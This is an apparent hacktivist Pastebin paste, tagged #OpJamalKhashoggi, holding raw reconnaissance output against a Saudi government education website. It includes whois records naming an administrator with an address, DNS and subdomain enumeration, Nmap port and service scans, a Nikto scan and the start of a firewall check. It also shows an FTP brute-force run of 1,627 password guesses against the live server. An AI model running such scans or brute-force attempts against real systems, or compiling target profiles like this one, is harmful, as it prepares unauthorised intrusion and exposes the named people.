Advertisement
Guest User

Anonymous JTSEC #OpJamalKhashoggi Full Recon #13

a guest
Nov 19th, 2018
1,382
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 139.50 KB | None | 0 0
  1. #######################################################################################################################################
  2. Hostname www.hbthedu.gov.sa ISP LeaseWeb Netherlands B.V.
  3. Continent Europe Flag
  4. NL
  5. Country Netherlands Country Code NL
  6. Region Unknown Local time 19 Nov 2018 09:36 CET
  7. City Unknown Postal Code Unknown
  8. IP Address 85.17.16.76 Latitude 52.382
  9. Longitude 4.9
  10. #######################################################################################################################################
  11. Server: 194.187.251.67
  12. Address: 194.187.251.67#53
  13.  
  14. Non-authoritative answer:
  15. www.hbthedu.gov.sa canonical name = hbthedu.gov.sa.
  16. Name: hbthedu.gov.sa
  17. Address: 85.17.16.76
  18. #######################################################################################################################################
  19. % SaudiNIC Whois server.
  20. % Rights restricted by copyright.
  21. % http://nic.sa/en/view/whois-cmd-copyright
  22.  
  23. Domain Name: hbthedu.gov.sa
  24.  
  25. Registrant:
  26. MOE-Directorate of Education in Alhotaa Province وزارة التربية والتعليم- إدارة التربية والتعليم بمحافظة حوطة بني تميم والحريق
  27. Address: لا يوجد
  28. alhota
  29. Saudi Arabia المملكة العربية السعودية
  30.  
  31. Administrative Contact:
  32. إبراهيم عبدالله موسى آل حسين
  33. Address: حوطة بني تميم - السلامية - حي المنار
  34. 11941 حوطة بني تميم
  35. Saudi Arabia
  36.  
  37. Technical Contact:
  38. إبراهيم عبدالله موسى آل حسين
  39. Address: حوطة بني تميم - السلامية - حي المنار
  40. 11941 حوطة بني تميم
  41. المملكة العربية السعودية
  42.  
  43. Name Servers:
  44. ns2.dimofinf.net
  45. ns1.dimofinf.net
  46. ns3.dimofinf.net
  47.  
  48. Created on: 2002-01-20
  49. Last Updated on: 2015-09-22
  50. #######################################################################################################################################
  51. [i] Scanning Site: http://www.hbthedu.gov.sa
  52.  
  53.  
  54.  
  55. B A S I C I N F O
  56. =======================================================================================================================================
  57.  
  58.  
  59. [+] Site Title: تعليم حوطة بني تميم والحريق
  60. [+] IP address: 85.17.16.76
  61. [+] Web Server: Could Not Detect
  62. [+] CMS: Could Not Detect
  63. [+] Cloudflare: Not Detected
  64. [+] Robots File: Found
  65.  
  66. -------------[ contents ]----------------
  67.  
  68. #Begin Attracta SEO Tools Sitemap. Do not remove
  69. sitemap: http://cdn.attracta.com/sitemap/4471531.xml.gz
  70. #End Attracta SEO Tools Sitemap. Do not remove
  71.  
  72. -----------[end of contents]-------------
  73.  
  74.  
  75.  
  76. W H O I S L O O K U P
  77. =======================================================================================================================================
  78.  
  79. % SaudiNIC Whois server.
  80. % Rights restricted by copyright.
  81. % http://nic.sa/en/view/whois-cmd-copyright
  82.  
  83. Domain Name: hbthedu.gov.sa
  84.  
  85. Registrant:
  86. MOE-Directorate of Education in Alhotaa Province وزارة التربية والتعليم- إدارة التربية والتعليم بمحافظة حوطة بني تميم والحريق
  87. Address: لا يوجد
  88. alhota
  89. Saudi Arabia المملكة العربية السعودية
  90.  
  91. Administrative Contact:
  92. إبراهيم عبدالله موسى آل حسين
  93. Address: حوطة بني تميم - السلامية - حي المنار
  94. 11941 حوطة بني تميم
  95. Saudi Arabia
  96.  
  97. Technical Contact:
  98. إبراهيم عبدالله موسى آل حسين
  99. Address: حوطة بني تميم - السلامية - حي المنار
  100. 11941 حوطة بني تميم
  101. المملكة العربية السعودية
  102.  
  103. Name Servers:
  104. ns2.dimofinf.net
  105. ns1.dimofinf.net
  106. ns3.dimofinf.net
  107.  
  108. Created on: 2002-01-20
  109. Last Updated on: 2015-09-22
  110.  
  111.  
  112.  
  113.  
  114.  
  115. G E O I P L O O K U P
  116. =======================================================================================================================================
  117.  
  118. [i] IP Address: 85.17.16.76
  119. [i] Country: NL
  120. [i] State: N/A
  121. [i] City: N/A
  122. [i] Latitude: 52.382401
  123. [i] Longitude: 4.899500
  124.  
  125.  
  126.  
  127.  
  128. H T T P H E A D E R S
  129. =======================================================================================================================================
  130.  
  131.  
  132. [i] HTTP/1.1 200 OK
  133. [i] Date: Mon, 19 Nov 2018 08:44:27 GMT
  134. [i] Content-Type: text/html
  135. [i] Vary: Accept-Encoding
  136. [i] X-Pingback: http://www.hbthedu.gov.sa/xmlrpc.php
  137. [i] Expires: Thu, 19 Nov 1981 08:52:00 GMT
  138. [i] Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  139. [i] Pragma: no-cache
  140. [i] Set-Cookie: PHPSESSID=9pc8a4jo928kgfg1bpm9f7tmm3; path=/
  141. [i] Set-Cookie: dim_styleid=1; expires=Tue, 19-Nov-2019 08:44:26 GMT; path=/; HttpOnly
  142. [i] Set-Cookie: dim_lastvisit=1542617066; expires=Tue, 19-Nov-2019 08:44:26 GMT; path=/
  143. [i] Set-Cookie: dim_lastactivity=0; expires=Tue, 19-Nov-2019 08:44:26 GMT; path=/
  144. [i] Access-Control-Allow-Origin: *
  145. [i] X-XSS-Protection: 1; mode=block
  146. [i] X-Nginx-Cache-Status: HIT
  147. [i] X-Server-Powered-By: Dimofinf INC
  148. [i] Connection: close
  149.  
  150.  
  151.  
  152.  
  153. D N S L O O K U P
  154. =======================================================================================================================================
  155.  
  156. hbthedu.gov.sa. 21599 IN SOA ns1.dimofinf.net. dedicated.server.dimofinf.net.sa. 2018092504 3600 7200 1209600 86400
  157. hbthedu.gov.sa. 21599 IN NS ns3.dimofinf.net.
  158. hbthedu.gov.sa. 21599 IN NS ns1.dimofinf.net.
  159. hbthedu.gov.sa. 21599 IN NS ns2.dimofinf.net.
  160. hbthedu.gov.sa. 14399 IN A 85.17.16.76
  161. hbthedu.gov.sa. 3599 IN MX 10 alt3.aspmx.l.google.com.
  162. hbthedu.gov.sa. 3599 IN MX 10 alt4.aspmx.l.google.com.
  163. hbthedu.gov.sa. 3599 IN MX 1 aspmx.l.google.com.
  164. hbthedu.gov.sa. 3599 IN MX 5 alt1.aspmx.l.google.com.
  165. hbthedu.gov.sa. 3599 IN MX 5 alt2.aspmx.l.google.com.
  166.  
  167.  
  168.  
  169.  
  170. S U B N E T C A L C U L A T I O N
  171. =======================================================================================================================================
  172.  
  173. Address = 85.17.16.76
  174. Network = 85.17.16.76 / 32
  175. Netmask = 255.255.255.255
  176. Broadcast = not needed on Point-to-Point links
  177. Wildcard Mask = 0.0.0.0
  178. Hosts Bits = 0
  179. Max. Hosts = 1 (2^0 - 0)
  180. Host Range = { 85.17.16.76 - 85.17.16.76 }
  181.  
  182.  
  183.  
  184. N M A P P O R T S C A N
  185. =======================================================================================================================================
  186.  
  187.  
  188. Starting Nmap 7.40 ( https://nmap.org ) at 2018-11-19 08:44 UTC
  189. Nmap scan report for hbthedu.gov.sa (85.17.16.76)
  190. Host is up (0.083s latency).
  191. rDNS record for 85.17.16.76: unlimited6.dimofinf.net
  192. PORT STATE SERVICE
  193. 21/tcp open ftp
  194. 22/tcp filtered ssh
  195. 23/tcp filtered telnet
  196. 80/tcp open http
  197. 110/tcp open pop3
  198. 143/tcp open imap
  199. 443/tcp open https
  200. 3389/tcp filtered ms-wbt-server
  201.  
  202. Nmap done: 1 IP address (1 host up) scanned in 1.89 seconds
  203. #######################################################################################################################################
  204. [?] Enter the target: http://www.hbthedu.gov.sa/
  205. [!] IP Address : 85.17.16.76
  206. [!] www.hbthedu.gov.sa doesn't seem to use a CMS
  207. [+] Honeypot Probabilty: 30%
  208. ---------------------------------------------------------------------------------------------------------------------------------------
  209. [~] Trying to gather whois information for www.hbthedu.gov.sa
  210. [+] Whois information found
  211. [-] Unable to build response, visit https://who.is/whois/www.hbthedu.gov.sa
  212. ---------------------------------------------------------------------------------------------------------------------------------------
  213. PORT STATE SERVICE
  214. 21/tcp open ftp
  215. 22/tcp filtered ssh
  216. 23/tcp filtered telnet
  217. 80/tcp open http
  218. 110/tcp open pop3
  219. 143/tcp open imap
  220. 443/tcp open https
  221. 3389/tcp filtered ms-wbt-server
  222. Nmap done: 1 IP address (1 host up) scanned in 1.89 seconds
  223. ---------------------------------------------------------------------------------------------------------------------------------------
  224.  
  225. [+] DNS Records
  226. ns3.dimofinf.net. (95.179.144.169) AS16022 Cosmoline Telecommunication Services S.A. Greece
  227. ns2.dimofinf.net. (167.99.30.33) United States United States
  228. ns1.dimofinf.net. (45.55.127.247) AS14061 Digital Ocean, Inc. United States
  229.  
  230. [+] MX Records
  231. 1 (172.217.197.27) AS15169 Google Inc. United States
  232.  
  233. [+] MX Records
  234. 10 (173.194.69.27) AS15169 Google Inc. United States
  235.  
  236. [+] MX Records
  237. 10 (173.194.76.27) AS15169 Google Inc. United States
  238.  
  239. [+] MX Records
  240. 5 (74.125.193.26) AS15169 Google Inc. United States
  241.  
  242. [+] MX Records
  243. 5 (64.233.186.26) AS15169 Google Inc. United States
  244.  
  245. [+] Host Records (A)
  246. www.hbthedu.gov.sa (unlimited6.dimofinf.net) (85.17.16.76) AS60781 LeaseWeb B.V. Netherlands
  247.  
  248. [+] TXT Records
  249.  
  250. [+] DNS Map: https://dnsdumpster.com/static/map/hbthedu.gov.sa.png
  251.  
  252. [>] Initiating 3 intel modules
  253. [>] Loading Alpha module (1/3)
  254. [>] Beta module deployed (2/3)
  255. [>] Gamma module initiated (3/3)
  256.  
  257.  
  258. [+] Emails found:
  259. --------------------------------------------------------------------------------------------------------------------------------------
  260. pixel-1542617072115242-web-@www.hbthedu.gov.sa
  261. pixel-1542617073214619-web-@www.hbthedu.gov.sa
  262. No hosts found
  263. [+] Virtual hosts:
  264. ---------------------------------------------------------------------------------------------------------------------------------------
  265. [~] Crawling the target for fuzzable URLs
  266. [-] No fuzzable URLs found
  267. #######################################################################################################################################
  268. --------------------------------------------------------------------------------------------------------------------------------------
  269. + Target IP: 85.17.16.76
  270. + Target Hostname: 85.17.16.76
  271. + Target Port: 443
  272. ---------------------------------------------------------------------------------------------------------------------------------------
  273. + SSL Info: Subject: /CN=unlimited6.dimofinf.net
  274. Ciphers: ECDHE-RSA-AES128-GCM-SHA256
  275. Issuer: /C=US/O=DigiCert Inc/OU=www.digicert.com/CN=RapidSSL RSA CA 2018
  276. + Start Time: 2018-11-19 03:43:06 (GMT-5)
  277. ---------------------------------------------------------------------------------------------------------------------------------------
  278. + Server: nginx
  279. + The anti-clickjacking X-Frame-Options header is not present.
  280. + Uncommon header 'x-server-powered-by' found, with contents: Dimofinf INC
  281. + Uncommon header 'x-nginx-cache-status' found, with contents: HIT
  282. + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
  283. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  284. + ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect: SSL negotiation failed: error:1408F10B:SSL routines:ssl3_get_record:wrong version number at /var/lib/nikto/plugins/LW2.pm line 5157.
  285. at /var/lib/nikto/plugins/LW2.pm line 5157.
  286. ; at /var/lib/nikto/plugins/LW2.pm line 5157.
  287. + Scan terminated: 20 error(s) and 5 item(s) reported on remote host
  288. + End Time: 2018-11-19 03:50:43 (GMT-5) (457 seconds)
  289. --------------------------------------------------------------------------------------------------------------------------------------
  290. ######################################################################################################################################
  291. [+] Hosting Info for Website: www.hbthedu.gov.sa
  292. [+] Visitors per day: 1,120
  293. [+] IP Address: ...
  294. [+] IP Reverse DNS (Host): unlimited6.dimofinf.net
  295. [+] Hosting Company: Leaseweb B.V
  296. [+] Hosting IP Range: 85.17.0.0 - 85.17.255.255 (65,536 ip)
  297. [+] Hosting Address: Ocom B.V. P.o. Box 93054, 1090 Bb Amsterdam, Netherlands
  298. [+] Hosting Country: NLD
  299. [+] Hosting Phone: +31203162880, +31 20 3162880
  300. [+] Hosting Website: www.leaseweb.com
  301. [+] Hosting CIDR: 85.17.0.0/16
  302.  
  303. [+] NS: hbthedu.gov.sa
  304. [+] NS: ns3.dimofinf.net
  305. [+] NS: ns1.dimofinf.net
  306. [+] NS: ns2.dimofinf.net
  307.  
  308. #######################################################################################################################################
  309. ; <<>> DiG 9.11.5-1-Debian <<>> hbthedu.gov.sa
  310. ;; global options: +cmd
  311. ;; Got answer:
  312. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 11285
  313. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
  314.  
  315. ;; OPT PSEUDOSECTION:
  316. ; EDNS: version: 0, flags:; udp: 4096
  317. ;; QUESTION SECTION:
  318. ;hbthedu.gov.sa. IN A
  319.  
  320. ;; ANSWER SECTION:
  321. hbthedu.gov.sa. 12935 IN A 85.17.16.76
  322.  
  323. ;; Query time: 133 msec
  324. ;; SERVER: 194.187.251.67#53(194.187.251.67)
  325. ;; WHEN: lun nov 19 04:01:20 EST 2018
  326. ;; MSG SIZE rcvd: 59
  327. #######################################################################################################################################
  328.  
  329. ; <<>> DiG 9.11.5-1-Debian <<>> +trace hbthedu.gov.sa
  330. ;; global options: +cmd
  331. . 80568 IN NS d.root-servers.net.
  332. . 80568 IN NS i.root-servers.net.
  333. . 80568 IN NS j.root-servers.net.
  334. . 80568 IN NS k.root-servers.net.
  335. . 80568 IN NS b.root-servers.net.
  336. . 80568 IN NS m.root-servers.net.
  337. . 80568 IN NS f.root-servers.net.
  338. . 80568 IN NS g.root-servers.net.
  339. . 80568 IN NS e.root-servers.net.
  340. . 80568 IN NS a.root-servers.net.
  341. . 80568 IN NS h.root-servers.net.
  342. . 80568 IN NS l.root-servers.net.
  343. . 80568 IN NS c.root-servers.net.
  344. . 80568 IN RRSIG NS 8 0 518400 20181202050000 20181119040000 2134 . meDpq/b38HWFlXKvvUtXs5wZXwy8+gqnFfQfx6abJibsigdRq66gnlvP h0kjBBpe6/lh5W64h9TgsaUvSBesksp1Gmq4hsAbNzVAL9x2dw164E6u CAaFirx1EQIlT+9crbsMyJ28JI2gXJfLP2biefKgpgtPqSJe3f2hdaga 0ZNnAnwigU+My4qR7R0oLfNGWq1zZjPEUMH2Pk67626IdDmWwfnYWPv1 NcY+FYv5gQXYd6tG/4KryFiFcBaXC7TIhkfx/AnOjxIIgqFR/1pdPnRg ALKnokzUXqJeklbp81N1st1nkEb3g0h1paCrYqZK78cO1NdRkHDrMgHq ScAFTQ==
  345. ;; Received 525 bytes from 194.187.251.67#53(194.187.251.67) in 135 ms
  346.  
  347. sa. 172800 IN NS s2.nic.net.sa.
  348. sa. 172800 IN NS sa1.dnsnode.net.
  349. sa. 172800 IN NS s.nic.net.sa.
  350. sa. 172800 IN NS ns1.nic.net.sa.
  351. sa. 172800 IN NS ns1.isu.net.sa.
  352. sa. 172800 IN NS sa-ns.anycast.pch.net.
  353. sa. 172800 IN NS ns2.nic.net.sa.
  354. sa. 86400 IN DS 22825 8 2 79A442F599B302034C6B635B50EDB3C801BD72936F7642D936F6D9A4 7B7A29BC
  355. sa. 86400 IN RRSIG DS 8 1 86400 20181202050000 20181119040000 2134 . jtoV64bh+cpVCkTKqJNdhzF6b9V95ciUrEuNiXfy9Y55PgAu4i235RHb FtV1wdmDjrpDGxvrnah/py1xuAylbcbP5kEB9/OskU5n6XvPeuHjixGB SwmrrYy+OjG613whVQA8ifB/UJS5cqUw7aor6GIm6//vwaUHBAO6Pam/ 7lKJnNLLpBvn0u+5TSik5mvjmk8T0gmV88i0Rz5Eqo3/cGJEt2ZrhRID HyCR3Rf7rLpIYekIrmD+jl4FRY7GtPdVyewRL8d6fuXiwXh8U0qu17OE Wqi0TLwWswI5OkVbBS1MKX2CE3qcq/Otd7OSNfLXaYEcW1/VygwjCmo6 4weVow==
  356. ;; Received 846 bytes from 2001:500:2::c#53(c.root-servers.net) in 139 ms
  357.  
  358. hbthedu.gov.sa. 3600 IN NS ns1.dimofinf.net.
  359. hbthedu.gov.sa. 3600 IN NS ns2.dimofinf.net.
  360. hbthedu.gov.sa. 3600 IN NS ns3.dimofinf.net.
  361. g75dg7hmve0juol4982jhoobsdn6bgh3.gov.sa. 3600 IN NSEC3 1 1 5 2174B4E5DB5E22BF I3BDV7GTACH085SBC52NJJ1N1EENJ2ME NS SOA RRSIG DNSKEY NSEC3PARAM
  362. g75dg7hmve0juol4982jhoobsdn6bgh3.gov.sa. 3600 IN RRSIG NSEC3 8 3 3600 20181128133818 20181114123901 20031 gov.sa. D9BEpJISsR8ncsaecrUL4lij+sJFGO7OV0P2i5NJ1SSnJIPm//+ts/jA HcMCjGCZlmQIZRg/v+xyqsUDLJDmTkIBa1NTgcNP8QEwYCXPIi4QjC7l l4OsYb1eiKvgonVlfzePEigBBmtjwqMGzRpk3S3FzLqvCvvbeV8vYfDU f1bjaXjd6DCO0gxyFQl8FWK73ZThPI/5JeP0ln8z+5z8QyNQF2JSRykk fY170NflRrCzBzlAXAzW5euCddQIzJsb11yZwLFIEnYIF9IkQIPa83/d IdyBSsLBxEEsB0LXe5qQQcsLCqbCaPx4katdZemODRowJUCnXaKIX1yf p9noaA==
  363. 02npgm012psd07m9gub3f340qs00906q.gov.sa. 3600 IN NSEC3 1 1 5 2174B4E5DB5E22BF AQGGLRHVB4BVV6DJSOMF02F370AIHT2E NS DS RRSIG
  364. 02npgm012psd07m9gub3f340qs00906q.gov.sa. 3600 IN RRSIG NSEC3 8 3 3600 20181128133919 20181114123901 20031 gov.sa. I/epld+DBrq1xNXix6MDvCtVwnDfKEN0cXED8lUp2RJjd7eJ3DreOH1X 9w4m7ZSTHEZYD6aZzNdlYfDPIFo4o2RBVIyJH7KmRuIPSmAgcZovRfcC p7yTQCf8UuuVIa10bJg9WL5sszhWAN2NMxpD0fxxZxGBL2RsEDyyFw7j jTWrajJ9+s/Ue32Vf0aXrHQjScnIUVo9QjC9k3mjHJFNcTs13MHYUUnC cpUTPsKdHbYjuyzScbfJJWiY0lsPKeWwhhoMer2FiyFvnGEgtlhAX7tB JmY2MP60PTZ+LwprHg3MtE9UoX3L7QyFnOg8OfT10BqwpA+WJ+jClWoM Z3IQFg==
  365. ;; Received 872 bytes from 86.111.196.9#53(ns2.nic.net.sa) in 239 ms
  366.  
  367. hbthedu.gov.sa. 14400 IN A 85.17.16.76
  368. hbthedu.gov.sa. 86400 IN NS ns1.dimofinf.net.
  369. hbthedu.gov.sa. 86400 IN NS ns3.dimofinf.net.
  370. hbthedu.gov.sa. 86400 IN NS ns2.dimofinf.net.
  371. ;; Received 173 bytes from 2400:6180:0:d1::5c5:c001#53(ns2.dimofinf.net) in 283 ms
  372.  
  373. #######################################################################################################################################
  374. [*] Performing General Enumeration of Domain: hbthedu.gov.sa
  375. [-] DNSSEC is not configured for hbthedu.gov.sa
  376. [*] SOA ns1.dimofinf.net 45.55.127.247
  377. [*] NS ns2.dimofinf.net 167.99.30.33
  378. [*] Bind Version for 167.99.30.33 9.9.4-RedHat-9.9.4-61.el7_5.1
  379. [*] NS ns2.dimofinf.net 2400:6180:0:d1::5c5:c001
  380. [*] Bind Version for 2400:6180:0:d1::5c5:c001 9.9.4-RedHat-9.9.4-61.el7_5.1
  381. [*] NS ns3.dimofinf.net 95.179.144.169
  382. [*] Bind Version for 95.179.144.169 9.9.4-RedHat-9.9.4-61.el7_5.1
  383. [*] NS ns3.dimofinf.net 2001:19f0:5001:14ec:5400:1ff:fe99:544c
  384. [*] Bind Version for 2001:19f0:5001:14ec:5400:1ff:fe99:544c 9.9.4-RedHat-9.9.4-61.el7_5.1
  385. [*] NS ns1.dimofinf.net 45.55.127.247
  386. [*] Bind Version for 45.55.127.247 9.8.2rc1-RedHat-9.8.2-0.68.rc1.el6_10.1
  387. [*] NS ns1.dimofinf.net 2604:a880:800:10::23:1001
  388. [*] Bind Version for 2604:a880:800:10::23:1001 9.8.2rc1-RedHat-9.8.2-0.68.rc1.el6_10.1
  389. [*] MX alt3.aspmx.l.google.com 108.177.125.26
  390. [*] MX aspmx.l.google.com 173.194.76.26
  391. [*] MX alt1.aspmx.l.google.com 64.233.164.27
  392. [*] MX alt2.aspmx.l.google.com 172.217.194.27
  393. [*] MX alt4.aspmx.l.google.com 74.125.195.27
  394. [*] MX alt3.aspmx.l.google.com 2404:6800:4008:c01::1a
  395. [*] MX aspmx.l.google.com 2a00:1450:400c:c09::1a
  396. [*] MX alt1.aspmx.l.google.com 2a00:1450:4010:c07::1a
  397. [*] MX alt2.aspmx.l.google.com 2404:6800:4003:c04::1b
  398. [*] MX alt4.aspmx.l.google.com 2607:f8b0:400e:c09::1a
  399. [*] A hbthedu.gov.sa 85.17.16.76
  400. [*] Enumerating SRV Records
  401. [*] SRV _carddav._tcp.hbthedu.gov.sa unlimited6.dimofinf.net 85.17.16.76 2079 0
  402. [*] SRV _carddav._tcp.hbthedu.gov.sa unlimited6.dimofinf.net 2001:1af8:4700:a075:14:: 2079 0
  403. [*] SRV _caldavs._tcp.hbthedu.gov.sa unlimited6.dimofinf.net 85.17.16.76 2080 0
  404. [*] SRV _caldavs._tcp.hbthedu.gov.sa unlimited6.dimofinf.net 2001:1af8:4700:a075:14:: 2080 0
  405. [*] SRV _carddavs._tcp.hbthedu.gov.sa unlimited6.dimofinf.net 85.17.16.76 2080 0
  406. [*] SRV _carddavs._tcp.hbthedu.gov.sa unlimited6.dimofinf.net 2001:1af8:4700:a075:14:: 2080 0
  407. [*] SRV _caldav._tcp.hbthedu.gov.sa unlimited6.dimofinf.net 85.17.16.76 2079 0
  408. [*] SRV _caldav._tcp.hbthedu.gov.sa unlimited6.dimofinf.net 2001:1af8:4700:a075:14:: 2079 0
  409. [+] 8 Records Found
  410. #######################################################################################################################################
  411.  
  412. Ip Address Status Type Domain Name Server
  413. ---------------------------------------------------------------------------------------------------------------------------------------
  414. 85.17.16.76 200 host ftp.hbthedu.gov.sa
  415. 85.17.16.76 302 alias mail.hbthedu.gov.sa
  416. 85.17.16.76 302 host hbthedu.gov.sa
  417. 85.17.16.76 200 alias www.hbthedu.gov.sa
  418. 85.17.16.76 200 host hbthedu.gov.sa
  419. #######################################################################################################################################
  420. [+] Testing domain
  421. www.hbthedu.gov.sa 85.17.16.76
  422. [+] Dns resolving
  423. Domain name Ip address Name server
  424. hbthedu.gov.sa 85.17.16.76 unlimited6.dimofinf.net
  425. Found 1 host(s) for hbthedu.gov.sa
  426. [+] Testing wildcard
  427. Ok, no wildcard found.
  428.  
  429. [+] Scanning for subdomain on hbthedu.gov.sa
  430. [!] Wordlist not specified. I scannig with my internal wordlist...
  431. Estimated time about 71.16 seconds
  432.  
  433. Subdomain Ip address Name server
  434.  
  435. ftp.hbthedu.gov.sa 85.17.16.76 unlimited6.dimofinf.net
  436. mail.hbthedu.gov.sa 85.17.16.76 unlimited6.dimofinf.net
  437. www.hbthedu.gov.sa 85.17.16.76 unlimited6.dimofinf.net
  438.  
  439. Found 3 subdomain(s) in 3 host(s) in 275.18 second(s)
  440. #######################################################################################################################################
  441. *] Processing domain hbthedu.gov.sa
  442. [+] Getting nameservers
  443. 167.99.30.33 - ns2.dimofinf.net
  444. 95.179.144.169 - ns3.dimofinf.net
  445. 45.55.127.247 - ns1.dimofinf.net
  446. [-] Zone transfer failed
  447.  
  448. [+] MX records found, added to target list
  449. 10 alt3.aspmx.l.google.com.
  450. 1 aspmx.l.google.com.
  451. 5 alt1.aspmx.l.google.com.
  452. 5 alt2.aspmx.l.google.com.
  453. 10 alt4.aspmx.l.google.com.
  454.  
  455. [*] Scanning hbthedu.gov.sa for A records
  456. 85.17.16.76 - hbthedu.gov.sa
  457. 85.17.16.76 - autoconfig.hbthedu.gov.sa
  458. 85.17.16.76 - autodiscover.hbthedu.gov.sa
  459. 85.17.16.76 - ftp.hbthedu.gov.sa
  460. 85.17.16.76 - mail.hbthedu.gov.sa
  461. 85.17.16.76 - www.hbthedu.gov.sa
  462. #######################################################################################################################################
  463.  
  464. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 03:43 EST
  465. Nmap scan report for 85.17.16.76
  466. Host is up (0.13s latency).
  467. Not shown: 461 filtered ports, 5 closed ports
  468. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  469. PORT STATE SERVICE
  470. 21/tcp open ftp
  471. 80/tcp open http
  472. 110/tcp open pop3
  473. 143/tcp open imap
  474. 443/tcp open https
  475. 465/tcp open smtps
  476. 587/tcp open submission
  477. 993/tcp open imaps
  478. 995/tcp open pop3s
  479. 8890/tcp open ddi-tcp-3
  480. #######################################################################################################################################
  481. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 03:43 EST
  482. Nmap scan report for 85.17.16.76
  483. Host is up (0.12s latency).
  484. Not shown: 2 filtered ports, 1 closed port
  485. PORT STATE SERVICE
  486. 67/udp open|filtered dhcps
  487. 68/udp open|filtered dhcpc
  488. 69/udp open|filtered tftp
  489. 88/udp open|filtered kerberos-sec
  490. 123/udp open|filtered ntp
  491. 139/udp open|filtered netbios-ssn
  492. 161/udp open|filtered snmp
  493. 162/udp open|filtered snmptrap
  494. 389/udp open|filtered ldap
  495. 520/udp open|filtered route
  496. 2049/udp open|filtered nfs
  497. #######################################################################################################################################
  498. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 03:44 EST
  499. Nmap scan report for 85.17.16.76
  500. Host is up (0.13s latency).
  501.  
  502. PORT STATE SERVICE VERSION
  503. 21/tcp open ftp Pure-FTPd
  504. | ftp-brute:
  505. | Accounts: No valid accounts found
  506. |_ Statistics: Performed 1627 guesses in 185 seconds, average tps: 11.0
  507. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  508. Aggressive OS guesses: Linux 3.10 - 4.11 (95%), Linux 3.2 - 4.9 (95%), Linux 3.16 (94%), Linux 3.18 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (93%), HP P2000 G3 NAS device (92%), Oracle VM Server 3.4.2 (Linux 4.1) (91%)
  509. No exact OS matches for host (test conditions non-ideal).
  510. Network Distance: 9 hops
  511.  
  512. TRACEROUTE (using port 21/tcp)
  513. HOP RTT ADDRESS
  514. 1 121.10 ms 10.251.200.1
  515. 2 121.34 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
  516. 3 131.98 ms 82.102.29.40
  517. 4 130.76 ms 176.10.83.5
  518. 5 134.25 ms hu-0-6-0-0.bb03.ams-01.leaseweb.net (80.249.208.215)
  519. 6 134.22 ms be-104.br02.ams-01.nl.leaseweb.net (31.31.38.143)
  520. 7 133.10 ms 81.17.34.17
  521. 8 132.11 ms po-1006.ce01.ams-01.nl.leaseweb.net (81.17.33.131)
  522. 9 132.33 ms 85.17.16.76
  523. #######################################################################################################################################
  524. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 03:47 EST
  525. Nmap scan report for 85.17.16.76
  526. Host is up.
  527.  
  528. PORT STATE SERVICE VERSION
  529. 67/udp open|filtered dhcps
  530. |_dhcp-discover: ERROR: Script execution failed (use -d to debug)
  531. Too many fingerprints match this host to give specific OS details
  532.  
  533. TRACEROUTE (using proto 1/icmp)
  534. HOP RTT ADDRESS
  535. 1 121.87 ms 10.251.200.1
  536. 2 123.60 ms 185.94.189.129
  537. 3 131.58 ms 82.102.29.40
  538. 4 131.55 ms 176.10.83.5
  539. 5 134.41 ms hu-0-6-0-0.bb03.ams-01.leaseweb.net (80.249.208.215)
  540. 6 134.36 ms ae-104.br01.ams-01.nl.leaseweb.net (31.31.38.141)
  541. 7 134.41 ms 81.17.34.23
  542. 8 133.26 ms po-1002.ce02.ams-01.nl.leaseweb.net (81.17.33.135)
  543. 9 ... 30
  544. #######################################################################################################################################
  545. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 03:50 EST
  546. Nmap scan report for 85.17.16.76
  547. Host is up.
  548.  
  549. PORT STATE SERVICE VERSION
  550. 68/udp open|filtered dhcpc
  551. Too many fingerprints match this host to give specific OS details
  552.  
  553. TRACEROUTE (using proto 1/icmp)
  554. HOP RTT ADDRESS
  555. 1 120.75 ms 10.251.200.1
  556. 2 134.64 ms 185.94.189.129
  557. 3 150.40 ms 82.102.29.40
  558. 4 130.38 ms 176.10.83.5
  559. 5 133.16 ms hu-0-6-0-0.bb03.ams-01.leaseweb.net (80.249.208.215)
  560. 6 132.75 ms ae-104.br01.ams-01.nl.leaseweb.net (31.31.38.141)
  561. 7 133.16 ms 81.17.34.23
  562. 8 132.15 ms po-1002.ce02.ams-01.nl.leaseweb.net (81.17.33.135)
  563. 9 ... 30
  564. #######################################################################################################################################
  565. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 03:52 EST
  566. Nmap scan report for 85.17.16.76
  567. Host is up.
  568.  
  569. PORT STATE SERVICE VERSION
  570. 69/udp open|filtered tftp
  571. Too many fingerprints match this host to give specific OS details
  572.  
  573. TRACEROUTE (using proto 1/icmp)
  574. HOP RTT ADDRESS
  575. 1 121.81 ms 10.251.200.1
  576. 2 122.24 ms 185.94.189.129
  577. 3 131.43 ms 82.102.29.40
  578. 4 131.46 ms 176.10.83.5
  579. 5 134.21 ms hu-0-6-0-0.bb03.ams-01.leaseweb.net (80.249.208.215)
  580. 6 133.83 ms ae-104.br01.ams-01.nl.leaseweb.net (31.31.38.141)
  581. 7 133.87 ms 81.17.34.23
  582. 8 133.21 ms po-1002.ce02.ams-01.nl.leaseweb.net (81.17.33.135)
  583. 9 ... 30
  584. #######################################################################################################################################
  585.  
  586. ^ ^
  587. _ __ _ ____ _ __ _ _ ____
  588. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  589. | V V // o // _/ | V V // 0 // 0 // _/
  590. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  591. <
  592. ...'
  593.  
  594. WAFW00F - Web Application Firewall Detection Tool
  595.  
